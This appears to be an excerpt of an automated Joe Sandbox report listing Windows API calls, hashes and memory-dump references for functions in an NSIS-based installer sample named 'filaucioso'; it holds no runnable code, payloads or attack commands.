                                                                        • Opcode Fuzzy Hash: a4ab23b94a56fbb4e4ab915d6a0181bd243ee2e30b5e95404a857257d08c8b81
                                                                        • Instruction Fuzzy Hash: 2211E25180479129FB3226280C44FB77F984B9B770F1901BFD4C6722C2C67C5CA6826D
                                                                        APIs
                                                                        • lstrcatA.KERNEL32(00000000,00000000,0040A3E8,007A9800,00000000,00000000,00000031), ref: 00401798
                                                                        • CompareFileTime.KERNEL32(-00000014,?,0040A3E8,0040A3E8,00000000,00000000,0040A3E8,007A9800,00000000,00000000,00000031), ref: 004017C2
                                                                          • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(0079ED28), ref: 0040514D
                                                                          • Part of subcall function 00405114: lstrlenA.KERNEL32(?,0079ED28), ref: 0040515D
                                                                          • Part of subcall function 00405114: lstrcatA.KERNEL32(0079ED28,?,?,0079ED28), ref: 00405170
                                                                          • Part of subcall function 00405114: SetWindowTextA.USER32(0079ED28,0079ED28), ref: 00405182
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051A8
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051C2
                                                                          • Part of subcall function 00405114: SendMessageA.USER32(?,00001013,?,00000000), ref: 004051D0
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                                        • String ID:
                                                                        • API String ID: 1941528284-0
                                                                        • Opcode ID: befae6215051d99b1ab4657fec02d01645aab5403196addd19f17b420424e560
                                                                        • Instruction ID: 0c6c4ee3c8c955c352dd186891d8ef18ee81d47802e2f4eda18a4991a1bfe0dc
                                                                        • Opcode Fuzzy Hash: befae6215051d99b1ab4657fec02d01645aab5403196addd19f17b420424e560
                                                                        • Instruction Fuzzy Hash: D841B471900515BACB10BBB5CD46D9F36B9DF45328B20823FF522F20E2D67C8A519A6E
                                                                        APIs
                                                                        • GetDlgItem.USER32(?), ref: 00401D58
                                                                        • GetClientRect.USER32(?,?), ref: 00401D9F
                                                                        • LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
                                                                        • SendMessageA.USER32(?,00000172,?,00000000), ref: 00401DDD
                                                                        • DeleteObject.GDI32(00000000), ref: 00401DF4
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                        • String ID:
                                                                        • API String ID: 1849352358-0
                                                                        • Opcode ID: 2bae10b4ae33dfedca707cc4008e68a37373c4f5b4a4a0668a98986923dff773
                                                                        • Instruction ID: 73b34c0ea56e2209ca6b10ab4d69fe2665be34d6bb8fccc5b8c3de89ec824b9e
                                                                        • Opcode Fuzzy Hash: 2bae10b4ae33dfedca707cc4008e68a37373c4f5b4a4a0668a98986923dff773
                                                                        • Instruction Fuzzy Hash: E8216672D00109AFDB05DF98DE44AEE7BB5FB48300F10407AF945F62A1CB789941CB58
                                                                        APIs
                                                                        • GetDC.USER32(?), ref: 00401E02
                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E1C
                                                                        • MulDiv.KERNEL32(00000000,00000000), ref: 00401E24
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00401E35
                                                                        • CreateFontIndirectA.GDI32(0040B7E8), ref: 00401E84
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CapsCreateDeviceFontIndirectRelease
                                                                        • String ID:
                                                                        • API String ID: 3808545654-0
                                                                        • Opcode ID: 05f1e8dbd8d2bd980b19a9bf60f2e06b7196c972b172c4b5c644a34e8c2871d7
                                                                        • Instruction ID: 7256709fe02f9cd86de6692cc41f874bddf10922414536e302f1c0253df40f98
                                                                        • Opcode Fuzzy Hash: 05f1e8dbd8d2bd980b19a9bf60f2e06b7196c972b172c4b5c644a34e8c2871d7
                                                                        • Instruction Fuzzy Hash: 3901B571900342AFE7019BB1AE49B997FB4EB55304F104439F251BB1E3CBB800059B6D
                                                                        APIs
                                                                        • CharNextA.USER32(?,00000000,?,?,004015CA,00000000,000000F0), ref: 00405A2C
                                                                        • CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A31
                                                                        • CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext
                                                                        • String ID: :$\
                                                                        • API String ID: 3213498283-1166558509
                                                                        • Opcode ID: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                        • Instruction ID: 200156b63a22a8533bc35d37f5bbbd655cb9a28a0338e71d1743e581b4aecdbb
                                                                        • Opcode Fuzzy Hash: b0e8f5e89ebadb76a027bec09a8a2b8523dc58ec169e45d2c78276560c1d622b
                                                                        • Instruction Fuzzy Hash: B2F09651B04F546AFB3292B40CD4B675B88CB95761F18867BD540B62C2C27C48504FAA
                                                                        APIs
                                                                        • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                                        • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Timeout
                                                                        • String ID: !
                                                                        • API String ID: 1777923405-2657877971
                                                                        • Opcode ID: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                        • Instruction ID: 70c5dabd3ba5e8ff49a6b9f2e1e1e4e729e8b40939c30b800ff2ff7c816f6e1a
                                                                        • Opcode Fuzzy Hash: c6d7f1a8d21ebdeb4ffd3b8fca0a359ba288ccf200932861a059a96450d8fb91
                                                                        • Instruction Fuzzy Hash: 91216BB1944208BEEF06AFA4DD8AAAD7FB5EB44304F10447EF501B61D1C7B88640DB18
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(0079F548,0079F548,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047DF,000000DF,00000000,00000400,?), ref: 00404962
                                                                        • wsprintfA.USER32 ref: 0040496A
                                                                        • SetDlgItemTextA.USER32(?,0079F548), ref: 0040497D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ItemTextlstrlenwsprintf
                                                                        • String ID: %u.%u%s%s
                                                                        • API String ID: 3540041739-3551169577
                                                                        • Opcode ID: b425e8249d3dbb4dd4c8837ae6e98a0b85a15bc17ec9f863b28494cdb090daaf
                                                                        • Instruction ID: 7420f511cdb836142555688b3451de143ce73197971a19baf3312835e895797a
                                                                        • Opcode Fuzzy Hash: b425e8249d3dbb4dd4c8837ae6e98a0b85a15bc17ec9f863b28494cdb090daaf
                                                                        • Instruction Fuzzy Hash: 0411DA736441283BEB10657D9C45EAF3298DB86374F260237FA26F31D1E979CC2251E8
                                                                        APIs
                                                                        • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402C9C
                                                                        • RegCloseKey.ADVAPI32(?,?,?), ref: 00402CBD
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Close$Enum
                                                                        • String ID:
                                                                        • API String ID: 464197530-0
                                                                        • Opcode ID: f81053263e66775c86f22c9e7281053eb29660a1472c423ac1bc7bfee237aa75
                                                                        • Instruction ID: 0ef75652e5200b2c3979a726b87f5b44e9bd6decc27dd8d038d5566faf8c77c7
                                                                        • Opcode Fuzzy Hash: f81053263e66775c86f22c9e7281053eb29660a1472c423ac1bc7bfee237aa75
                                                                        • Instruction Fuzzy Hash: CC119A32504109FBEF129F90CF09B9E7B6DEB14380F204032BD45B61E0E7B59E11ABA8
                                                                        APIs
                                                                        • CreateDirectoryA.KERNEL32(?,?,00000000), ref: 0040561D
                                                                        • GetLastError.KERNEL32 ref: 00405631
                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405646
                                                                        • GetLastError.KERNEL32 ref: 00405650
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                        • String ID:
                                                                        • API String ID: 3449924974-0
                                                                        • Opcode ID: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                        • Instruction ID: 74ab278e8dc0014e3bb1a2534afc1f4e11ab1799ac02ec3fccaeb9b03a53458b
                                                                        • Opcode Fuzzy Hash: 3f07113bbed92aa299f899006a5ac68722d9e9d13463f273e10feef126da3ab7
                                                                        • Instruction Fuzzy Hash: 42011A71C00619EADF009FA1D944BEFBBB8EF14354F00843AD549B6290D77996498FA9
                                                                        APIs
                                                                        • DestroyWindow.USER32(?,00000000,00402F3E,?), ref: 00402D73
                                                                        • GetTickCount.KERNEL32 ref: 00402D91
                                                                        • CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
                                                                        • ShowWindow.USER32(00000000,00000005), ref: 00402DBC
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                        • String ID:
                                                                        • API String ID: 2102729457-0
                                                                        • Opcode ID: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                        • Instruction ID: 59a190b5ca5e41810c33fe67e91fb44ed42669482eb3396a028566c2b75ef85f
                                                                        • Opcode Fuzzy Hash: 937823a9ca513d21e0cf2f2d626aeb3dfaa269d40a84f5f8bcfb97d910e847a5
                                                                        • Instruction Fuzzy Hash: 8DF05831941620EBC610AB24BE4CA8E7B74BB04B12711897BF449B11F4CB7C4C828B9C
                                                                        APIs
                                                                          • Part of subcall function 00405FED: lstrcpynA.KERNEL32(?,?,00000400,0040331A,007A2740,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FFA
                                                                          • Part of subcall function 00405A1E: CharNextA.USER32(?,00000000,?,?,004015CA,00000000,000000F0), ref: 00405A2C
                                                                          • Part of subcall function 00405A1E: CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A31
                                                                          • Part of subcall function 00405A1E: CharNextA.USER32(00000000,?,?,004015CA,00000000,000000F0), ref: 00405A45
                                                                        • lstrlenA.KERNEL32(007A0950,00000000,007A0950,007A0950,?,?,?,004057D5,?), ref: 00405AC6
                                                                        • GetFileAttributesA.KERNEL32(007A0950,007A0950,007A0950,007A0950,007A0950,007A0950,00000000,007A0950,007A0950,?,?,?,004057D5,?), ref: 00405AD6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                        • String ID: Pz
                                                                        • API String ID: 3248276644-4075803849
                                                                        • Opcode ID: b64babd179512e018bab78e554f82c4544fddaf0e52df0fe8d8ef1bdd38ac3b2
                                                                        • Instruction ID: 48b42070403af27e20b1f5acdd7358d009e8e21f6fdf4bd1af3726bdd8170272
                                                                        • Opcode Fuzzy Hash: b64babd179512e018bab78e554f82c4544fddaf0e52df0fe8d8ef1bdd38ac3b2
                                                                        • Instruction Fuzzy Hash: 2AF0A421215D6216D622323A1C89A9F1A58CEC7364709073FF866B12D3EA3C89439DAE
                                                                        APIs
                                                                        • IsWindowVisible.USER32(?), ref: 004050B7
                                                                        • CallWindowProcA.USER32(?,?,?,?), ref: 00405108
                                                                          • Part of subcall function 004040C7: SendMessageA.USER32(?,?,00000000,00000000), ref: 004040D9
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CallMessageProcSendVisible
                                                                        • String ID:
                                                                        • API String ID: 3748168415-3916222277
                                                                        • Opcode ID: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                        • Instruction ID: b4a086d39c893e0b6e30c02e44c042f184afa5b73794f50f798247e01a256ddd
                                                                        • Opcode Fuzzy Hash: aa27df10419a993b06254c4634be6a0ab58901204a819692472b88ae61f90a6b
                                                                        • Instruction Fuzzy Hash: 5C018471200609EFDF204F11DD84A6F3665EB84314F208037F605B65D1CB7A8C52AFAD
                                                                        APIs
                                                                        • RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,007A1EE0,(y,?,-000010B8,-000010B8,00000002,-000010B8,?,00406118,80000002), ref: 00405F1A
                                                                        • RegCloseKey.ADVAPI32(?,?,00406118,80000002,Software\Microsoft\Windows\CurrentVersion,-000010B8,007A1EE0,007A1EE0,?,0079ED28), ref: 00405F25
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CloseQueryValue
                                                                        • String ID: (y
                                                                        • API String ID: 3356406503-255812342
                                                                        • Opcode ID: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                        • Instruction ID: 2e4321f520f0c42760b8dd6c663e9e781067c597ec393d4c632fa8beed11a635
                                                                        • Opcode Fuzzy Hash: fbc34f94f804cf7f8ceee3a94302c0ccfb61d5b85e95000fdd84f5b54f9224ff
                                                                        • Instruction Fuzzy Hash: 3B019A7250020AAADF22CF20CC09FDB3BA8EF55360F00442AF904A2190D278CA54CFA8
                                                                        APIs
                                                                        • GetTickCount.KERNEL32 ref: 00405BC9
                                                                        • GetTempFileNameA.KERNEL32(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405BE3
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: CountFileNameTempTick
                                                                        • String ID: nsa
                                                                        • API String ID: 1716503409-2209301699
                                                                        • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                        • Instruction ID: d190f65444f006a88ba75eae1d2615f44ee573feb2fe82d01cd284afd59f947a
                                                                        • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                                        • Instruction Fuzzy Hash: C1F082363042086BDB109F56DD04B9B7BA9DFA1750F10803BFA489A280D6B4E9558758
                                                                        APIs
                                                                        • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405AFB
                                                                        • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405B13
                                                                        • CharNextA.USER32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B24
                                                                        • lstrlenA.KERNEL32(00000000,?,00000000,00405D46,00000000,[Rename],00000000,00000000,00000000), ref: 00405B2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000005.00000002.3007662766.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000005.00000002.3007647837.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007684355.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007700927.000000000040A000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000005.00000002.3007811707.00000000007B6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_5_2_400000_filaucioso.jbxd
                                                                        Similarity
                                                                        • API ID: lstrlen$CharNextlstrcmpi
                                                                        • String ID:
                                                                        • API String ID: 190613189-0
                                                                        • Opcode ID: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                        • Instruction ID: c1544da0d971e4a519e78892e838bc28cfb462c10397de1a7bf1af1224e2ff03
                                                                        • Opcode Fuzzy Hash: dddc0b46adaff912d9c321cf48e41736a02eed0190ef2a74250491e495455120
                                                                        • Instruction Fuzzy Hash: 9CF06232105418BFC712DFA5DD40D9EBBB8DF56250B2540BAE840F7251D674FE019BA9